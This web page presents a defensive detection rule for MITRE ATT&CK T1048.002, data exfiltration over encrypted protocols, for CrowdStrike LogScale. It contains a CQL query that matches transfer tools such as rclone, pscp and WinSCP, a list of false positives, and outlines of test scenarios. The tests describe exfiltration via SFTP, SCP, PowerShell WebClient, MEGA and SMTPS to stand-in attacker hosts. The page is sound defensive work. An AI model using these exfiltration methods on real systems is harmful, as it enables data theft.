T1048.002 CrowdStrike LogScale · LogScale

Detect Exfiltration Over Asymmetric Encrypted Non-C2 Protocol in CrowdStrike LogScale

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. Common protocols include HTTPS/TLS, SFTP, SCP, SMTPS, and FTPS. These protocols use asymmetric encryption (public-key cryptography) for key exchange, often transitioning to symmetric encryption for bulk data transfer. Because these protocols are widely used for legitimate business purposes, malicious exfiltration traffic can blend in with normal network activity. Threat actors such as APT28, CURIUM, and Storm-1811 have leveraged HTTPS, SMTPS, and SCP respectively for data exfiltration.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Sub-technique
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/002/

LogScale Detection Query

CrowdStrike LogScale (LogScale)
cql 
#event_simpleName in ("ProcessRollup2", "SyntheticProcessRollup2", "NetworkConnectIP4")
| case {
    #event_simpleName in ("ProcessRollup2", "SyntheticProcessRollup2")
    | where ImageFileName = /(?i)(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)/
        OR (ImageFileName = /(?i)(powershell\.exe|cmd\.exe)/ AND CommandLine = /(?i)(sftp|\bscp\b|smtps|ftps|webdav|rclone|winscp)/)
        OR (ImageFileName = /(?i)curl\.exe/ AND CommandLine = /(?i)(--ssl|--tls|sftp:\/\/|ftps:\/\/)/)
    | eval DetectionType = "ProcessExecution" ;

    #event_simpleName = "NetworkConnectIP4"
    | where RemotePort in (22, 443, 465, 587, 990, 993, 8443, 21)
    | where ImageFileName = /(?i)(rclone\.exe|winscp\.exe|pscp\.exe|psftp\.exe|filezilla\.exe|sftp\.exe|scp\.exe|curl\.exe|wget\.exe)/
    | where NOT RemoteAddressIP4 = /^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|127\.)/
    | eval DetectionType = "NetworkConnection" ;
  }
| eval ToolName = case(
    ImageFileName = /(?i)rclone\.exe/, "Rclone",
    ImageFileName = /(?i)winscp\.exe/, "WinSCP",
    ImageFileName = /(?i)(pscp|scp)\.exe/, "SCP",
    ImageFileName = /(?i)(psftp|sftp)\.exe/, "SFTP",
    ImageFileName = /(?i)filezilla\.exe/, "FileZilla",
    CommandLine = /(?i)sftp/, "SFTP-via-Script",
    CommandLine = /(?i)rclone/, "Rclone-via-Script",
    true(), "Unknown"
  )
| eval RcloneCopy = if(ImageFileName = /(?i)rclone\.exe/ AND CommandLine = /(?i)(copy|sync|move)/, "true", "false")
| eval RcloneRemote = if(ImageFileName = /(?i)rclone\.exe/ AND CommandLine = /(?i)(sftp|s3|gdrive|onedrive|mega|box|dropbox|webdav)/, "true", "false")
| table([@timestamp, ComputerName, UserName, ImageFileName, CommandLine, ParentImageFileName, RemoteAddressIP4, RemotePort, DetectionType, ToolName, RcloneCopy, RcloneRemote])
| sort(field=@timestamp, order=desc)
high severity high confidence

CrowdStrike Falcon LogScale (CQL) detection for T1048.002 exfiltration over asymmetrically encrypted non-C2 protocols. Uses a case-branched pipeline targeting ProcessRollup2/SyntheticProcessRollup2 events for known exfiltration tool execution and suspicious PowerShell/cmd invocations, plus NetworkConnectIP4 events showing those processes connecting to encrypted protocol ports (22/443/465/587/990/993/8443/21) on public IP addresses. Enriches each alert with tool classification, Rclone copy operation flags, and remote destination identification.

Data Sources

CrowdStrike Falcon Endpoint Protection with process and network telemetryCrowdStrike Falcon LogScale (formerly Humio)

Required Tables

ProcessRollup2SyntheticProcessRollup2NetworkConnectIP4

False Positives & Tuning

  • Authorized IT staff using rclone, WinSCP, or similar transfer tools for sanctioned data migration or backup operations to approved cloud endpoints or managed service providers
  • Development or DevOps workflows using sftp, scp, or curl to deploy application code or upload packages to remote servers as part of established CI/CD pipelines
  • Managed security or monitoring agents that communicate over HTTPS to vendor cloud infrastructure for telemetry upload, license validation, or policy retrieval
  • Endpoint backup agents configured to transmit encrypted backups via SFTP or HTTPS to off-site or cloud-hosted storage destinations on a scheduled basis
Download portable Sigma rule (.yml)

Other platforms for T1048.002

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Rclone Exfiltration via SFTP

    Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy', 'sftp://', destination IP, and --sftp-pass flag. Sysmon Event ID 3: Network connection attempt to 192.0.2.1:22. DeviceProcessEvents and DeviceNetworkEvents in MDE will capture the event.

  2. Test 2SCP File Transfer to External Host

    Expected signal: Sysmon Event ID 1: Process Create with Image=pscp.exe, CommandLine containing destination IP, remote path, and -pw flag (password in clear text is itself a forensic indicator). Sysmon Event ID 3: TCP connection attempt to 198.51.100.1:22. Security Event ID 4688 if command-line auditing is enabled.

  3. Test 3PowerShell HTTPS Exfiltration via WebClient Upload

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Net.WebClient', 'UploadData', and 'https://'. Sysmon Event ID 3: TCP connection attempt to 127.0.0.1:4443. PowerShell ScriptBlock Log Event ID 4104 with full script. DeviceNetworkEvents in MDE will show the HTTPS connection attempt.

  4. Test 4Rclone MEGA Cloud Storage Exfiltration Simulation

    Expected signal: Sysmon Event ID 11: File creation of rclone_test.conf in %TEMP% containing MEGA credentials. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine referencing --config path and 'mega_remote:'. Sysmon Event ID 3: DNS query and TCP connection attempt to MEGA API endpoints (g.api.mega.co.nz). DeviceFileEvents will capture config file creation.

  5. Test 5SMTPS Email Exfiltration via PowerShell

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'SmtpClient', 'EnableSsl = $true', port 587, and external hostname. Sysmon Event ID 3: TCP connection attempt to smtp.attacker-controlled.com:587. Sysmon Event ID 22: DNS query for attacker-controlled.com. PowerShell ScriptBlock Log Event ID 4104 with full script content.

Last updated: 2026-04-16 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1048.002 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1048Exfiltration Over Alternative Protocol

Related Sub-techniques

T1048.001Exfiltration Over Symmetric Encrypted Non-C2 ProtocolT1048.003Exfiltration Over Unencrypted Non-C2 Protocol

Related Techniques

T1048Exfiltration Over Alternative ProtocolT1048.001Exfiltration Over Symmetric Encrypted Non-C2 ProtocolT1567Exfiltration Over Web ServiceT1567.001Exfiltration to Code RepositoryT1567.004Exfiltration Over WebhookT1560Archive Collected DataT1560.001Archive via UtilityT1074Data StagedT1029Scheduled TransferT1020Automated ExfiltrationT1005Data from Local SystemT1078Valid Accounts

Same Tactic: Exfiltration

Popular Detections